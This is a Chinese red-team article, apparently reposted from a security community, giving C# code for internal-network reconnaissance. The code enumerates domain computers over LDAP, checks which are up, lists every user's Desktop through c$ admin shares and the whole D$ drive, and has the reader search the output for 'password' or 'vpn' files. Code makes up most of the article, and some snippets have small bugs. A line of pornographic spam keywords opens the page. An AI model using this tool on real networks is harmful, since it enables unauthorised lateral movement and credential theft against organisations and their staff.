热99视频66,91久久婷婷,亚洲一卡二卡,亚洲嗯啊,无码肉厚美臂小早川怜子,亚洲人视频网站,黄色毛片一级片,亚洲高清无码视频免观看

文章首發(fā)先知社區(qū)：https://xz.aliyun.com/t/11667

域內(nèi)批量獲取敏感文件

域內(nèi)如果我們要獲取指定機(jī)器，恰巧那臺(tái)機(jī)器為linux只開了22等端口或者說無法從常規(guī)web打點(diǎn)進(jìn)入，我們可以尋找運(yùn)維機(jī)器的密碼本，一臺(tái)一臺(tái)翻的話成本太高，就可以通過批量獲取域內(nèi)桌面文件。

0x01 批量獲取域內(nèi)機(jī)器名

自動(dòng)化工具，當(dāng)然就要全自動(dòng)，懶人必備。net group "domain computers" /do ，獲取機(jī)器是3個(gè)一排，然后可以通過正則刪除空格，每次也麻煩，直接獲取機(jī)器名更加方便。

思路就是連接ldap然后指定過濾條件(&(objectclass=computer))獲取機(jī)器。

獲取域內(nèi)機(jī)器

public static DirectoryEntry coon = null;
public static DirectorySearcher search = null;
url = "LDAP://" + ip; 
username = domain user;
password = domain pass;
coon = new DirectoryEntry(url, username, password);
search = new DirectorySearcher(coon);
search.Filter = "(&(objectclass=computer))
 foreach (SearchResult r in Ldapcoon.search.FindAll())
 {
     string computername = "";
     computername = r.Properties["cn"][0].ToString();
     Console.WriteLine(computername);
 }

0x02 機(jī)器探測(cè)存活

1.把上述機(jī)器放入machine.txt內(nèi)，然后逐行讀取

StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
    string machine = machine_name.ReadLine();
    Console.WriteLine(machine);
}

2.探測(cè)探測(cè)存活，這里面向谷歌

 public static bool IsMachineUp(string hostName)
        {
            bool retVal = false;
            try
            {
                Ping pingSender = new Ping();
                PingOptions options = new PingOptions();
                // Use the default Ttl value which is 128,
                // but change the fragmentation behavior.
                options.DontFragment = true;
                // Create a buffer of 32 bytes of data to be transmitted.
                string data = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
                byte[] buffer = Encoding.ASCII.GetBytes(data);
                int timeout = 800;

                PingReply reply = pingSender.Send(hostName, timeout, buffer, options);
                if (reply.Status == IPStatus.Success)
                {
                    retVal = true;
                }
            }
            catch (Exception ex)
            {
                retVal = false;
                //Console.ForegroundColor = ConsoleColor.Red;
                //Console.WriteLine("[-]" + ex.Message);
                //Console.ForegroundColor = ConsoleColor.White;
            }
            return retVal;
        }

一般來說it機(jī)器都為工作機(jī)而非服務(wù)器，可能存在下班關(guān)機(jī)等情況，如果大多機(jī)器處于關(guān)機(jī)情況下，就會(huì)浪費(fèi)比較多的時(shí)間，所以優(yōu)先判斷存活是很有必要的。

StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
    try
    {
        string machine = machine_name.ReadLine();
        if (IsMachineUp(machine))
     {
      //操作
     }
    }
    catch { }
}

0x03 獲取桌面文件

我們這里構(gòu)造獲取結(jié)果目錄呈現(xiàn)結(jié)果為：

TargetDesktopinfos
    機(jī)器1
        用戶A
            文件
        用戶B
            文件
    機(jī)器2
        用戶C
            文件
        用戶D
            文件

首先獲取當(dāng)前路徑創(chuàng)建TargetDesktopinfos目錄。

string currentpath = Directory.GetCurrentDirectory();
DesktopFiles = currentpath + "\\TargetDesktopinfos";
Directory.CreateDirectory(DesktopFiles);

然后獲取目標(biāo)機(jī)器c:\users\目錄，如果存在該目錄創(chuàng)建機(jī)器名

string userpath = @"\\" + machine + @"\c$\users";
var user_list = Directory.EnumerateDirectories(userpath);
if (Directory.Exists(userpath))
{
//創(chuàng)建機(jī)器名文件夾
    string MachineFolder = DesktopFiles + "\\" + machine;
    Directory.CreateDirectory(MachineFolder);

再遍歷users目錄存在哪些用戶，同理如果存在desktop目錄創(chuàng)建用戶名和desktop.txt。

string userpath = @"\\" + machine + @"\c$\users";
var user_list = Directory.EnumerateDirectories(userpath);
if (Directory.Exists(userpath))
{
//創(chuàng)建機(jī)器名文件夾
string MachineFolder = DesktopFiles + "\\" + machine;
Directory.CreateDirectory(MachineFolder);
foreach (string user in user_list)
{
string DesktopDirectoryPath = user + "\\desktop";
string username = substring(user);
if (Directory.Exists(DesktopDirectoryPath))
{
//創(chuàng)建用戶名文件夾
string UserFolder = MachineFolder + "\\" + username;
Directory.CreateDirectory(UserFolder);
//創(chuàng)建desktop.txt文件
string Desktoptxt = UserFolder + "\\desktop.txt";
StreamWriter sw = File.CreateText(Desktoptxt);
sw.Close();

接下來就是遍歷desktop目錄所有文件以及文件夾內(nèi)的文件。

這里用到Directory.GetFileSystemEntries方法

public static string[] GetFileSystemEntries (string path, string searchPattern, System.IO.SearchOption searchOption);
第一個(gè)參數(shù)path：要搜索的路徑。

第二個(gè)參數(shù)searchPattern：要與 `path` 中的文件和目錄的名稱匹配的搜索字符串。

第三個(gè)參數(shù)searchOption，指定搜索操作是應(yīng)僅包含當(dāng)前目錄還是應(yīng)包含所有子目錄的枚舉值之一。

這里的SearchOption.AllDirectories我們使用SearchOption.AllDirectories,表示在搜索操作中包括當(dāng)前目錄和所有它的子目錄。

完整代碼如下

try
            {
                string DesktopFiles = "";
                //獲取機(jī)器名
                StreamReader machine_name = new StreamReader(@"machine.txt");
                while (!machine_name.EndOfStream)
                {
                    try
                    {
                        string machine = machine_name.ReadLine();
                        if (IsMachineUp(machine))
                        {
                            //獲取當(dāng)前路徑
                            string currentpath = Directory.GetCurrentDirectory();
                            DesktopFiles = currentpath + "\\TargetDesktopinfos";
                            Directory.CreateDirectory(DesktopFiles);
                            Console.WriteLine("[*]" + machine);
                            //獲取users目錄
                            string userpath = @"\\" + machine + @"\c$\users";
                            var user_list = Directory.EnumerateDirectories(userpath);
                            if (Directory.Exists(userpath))
                            {
                                //創(chuàng)建機(jī)器名文件夾
                                string MachineFolder = DesktopFiles + "\\" + machine;
                                Directory.CreateDirectory(MachineFolder);
                                foreach (string user in user_list)
                                {
                                    string DesktopDirectoryPath = user + "\\desktop";
                                    string username = substring(user);
                                    if (Directory.Exists(DesktopDirectoryPath))
                                    {
                                        //創(chuàng)建用戶名文件夾
                                        string UserFolder = MachineFolder + "\\" + username;
                                        Directory.CreateDirectory(UserFolder);
                                        //創(chuàng)建desktop.txt文件
                                        string Desktoptxt = UserFolder + "\\desktop.txt";
                                        StreamWriter sw = File.CreateText(Desktoptxt);
                                        sw.Close();

                                        string info_user = substring(user);
                                        Console.ForegroundColor = ConsoleColor.Green;
                                        Console.WriteLine("[*]" + info_user);
                                        Console.ForegroundColor = ConsoleColor.White;

                                        string[] AllFiles = Directory.GetFileSystemEntries(DesktopDirectoryPath, "*", SearchOption.AllDirectories);

                                        foreach (string file in AllFiles)
                                        {
                                            Console.WriteLine(file);
                                            string create_time = Directory.GetCreationTime(file).ToString();
                                            string writeFileTo = "create time:" + create_time + "  " + file + "\r\n";
                                            File.AppendAllText(Desktoptxt, writeFileTo);
                                        }
                                    }
                                    else
                                    {
                                        continue;
                                    }
                                }
                            }
                        }
                        else
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("[-]" + machine + " is down");
                            Console.ForegroundColor = ConsoleColor.White;
                        }
                    }
                    catch (System.Exception ex)
                    {
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.WriteLine("[-] error");
                        Console.WriteLine("[-] Exception: " + ex.Message);
                        Console.ForegroundColor = ConsoleColor.White;
                        continue;
                    }
                }
                machine_name.Close();
                Console.WriteLine("[+]out put to:" + DesktopFiles);
            }
            catch (System.Exception ex)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[-] error");
                Console.WriteLine("[-] Exception: " + ex.Message);
                Console.ForegroundColor = ConsoleColor.White;
                return;
            }

同理要獲取DEF盤，這里就舉例D盤

public static void D()
        {
            try
            {
                string DFiles = "";
                StreamReader machine_name = new StreamReader(@"machine.txt");
                while (!machine_name.EndOfStream)
                {
                    try
                    {
                        string machine = machine_name.ReadLine();
                        if (IsMachineUp(machine))
                        {
                            string currentpath = Directory.GetCurrentDirectory();
                            DFiles = currentpath + "\\DInfos";
                            Directory.CreateDirectory(DFiles);

                            Console.ForegroundColor = ConsoleColor.Yellow;
                            Console.WriteLine("[*]" + machine);
                            Console.ForegroundColor = ConsoleColor.White;

                            //獲取users目錄
                            string dpath = @"\\" + machine + @"\d$";
                            var d_list = Directory.EnumerateDirectories(dpath);
                            if (Directory.Exists(dpath))
                            {
                                //創(chuàng)建機(jī)器名文件夾
                                string MachineFolder = DFiles + "\\" + machine;
                                Directory.CreateDirectory(MachineFolder);
                                //創(chuàng)建輸出文本
                                string E_txt = MachineFolder + "\\dFiles.txt";
                                StreamWriter sw = File.CreateText(E_txt);
                                sw.Close();
                                try
                                {
                                    var files = Directory.GetFiles(dpath);
                                    foreach (string file in files)
                                    {
                                        Console.WriteLine(file);
                                        string create_time = Directory.GetCreationTime(file).ToString();
                                        string writeFileTo = "create time:" + create_time + "  " + file + "\r\n";
                                        File.AppendAllText(E_txt, writeFileTo);
                                    }

                                    var directorys = Directory.EnumerateDirectories(dpath);
                                    foreach (string directory in directorys)
                                    {
                                        if (!directory.Contains("System Volume Information"))
                                        {
                                            string[] AllFiles = Directory.GetFileSystemEntries(directory, "*", SearchOption.AllDirectories);
                                            foreach (string file in AllFiles)
                                            {
                                                string create_time = Directory.GetCreationTime(file).ToString();
                                                Console.WriteLine(file);
                                                string writeFileTo = "create time:" + create_time + "  " + file + "\r\n";
                                                File.AppendAllText(E_txt, writeFileTo);
                                            }
                                        }
                                    }
                                }
                                catch (UnauthorizedAccessException ex)
                                {
                                    Console.ForegroundColor = ConsoleColor.Red;
                                    Console.WriteLine(ex.Message);
                                    Console.ForegroundColor = ConsoleColor.White;
                                    //goto cc;
                                }


                            }
                        }
                    }
                    catch (System.Exception ex)
                    {
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.WriteLine("[-] 不存在D盤");
                        Console.WriteLine(ex.Message);
                        Console.ForegroundColor = ConsoleColor.White;
                        continue;
                    }
                }
                machine_name.Close();
                Console.WriteLine("[+]out put to:" + DFiles);
            }
            catch (System.Exception ex)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[-] error");
                Console.WriteLine("[-] Exception: " + ex.Message);
                Console.ForegroundColor = ConsoleColor.White;
                return;
            }
        }

這里我們?cè)?8這臺(tái)域機(jī)器桌面存放文件

測(cè)試效

結(jié)果呈現(xiàn)

接下來直接文件夾搜索password或者vpn等關(guān)鍵字即可。

如果覺得本文不錯(cuò)的話，歡迎加入知識(shí)星球，星球內(nèi)部設(shè)立了多個(gè)技術(shù)版塊，目前涵蓋“WEB安全”、“內(nèi)網(wǎng)滲透”、“CTF技術(shù)區(qū)”、“漏洞分析”、“工具分享”五大類，星球內(nèi)部新設(shè)立紅隊(duì)專欄，成立紅隊(duì)全方位知識(shí)體系。目前紅隊(duì)專欄已有以下三大板塊：【外部打點(diǎn)】【權(quán)限維持】【內(nèi)網(wǎng)滲透】，即將推出【免殺技術(shù)】板塊。還可以與嘉賓大佬們接觸，在線答疑、互相探討。

獎(jiǎng)勵(lì)計(jì)劃

白帽子社區(qū)紅隊(duì)知識(shí)星球獎(jiǎng)勵(lì)計(jì)劃活動(dòng)正在進(jìn)行中，可參考相關(guān)渠道免費(fèi)加入知識(shí)星球，不僅能夠在星球中進(jìn)行學(xué)習(xí)，更能夠在星球中靠自己的技術(shù)能力賺取豐厚收益。詳細(xì)介紹點(diǎn)擊文章：（附抽獎(jiǎng)福利）

紅隊(duì)專家獎(jiǎng)勵(lì)計(jì)劃（文末抽獎(jiǎng)）

▼掃碼關(guān)注白帽子社區(qū)公眾號(hào)&加入知識(shí)星球▼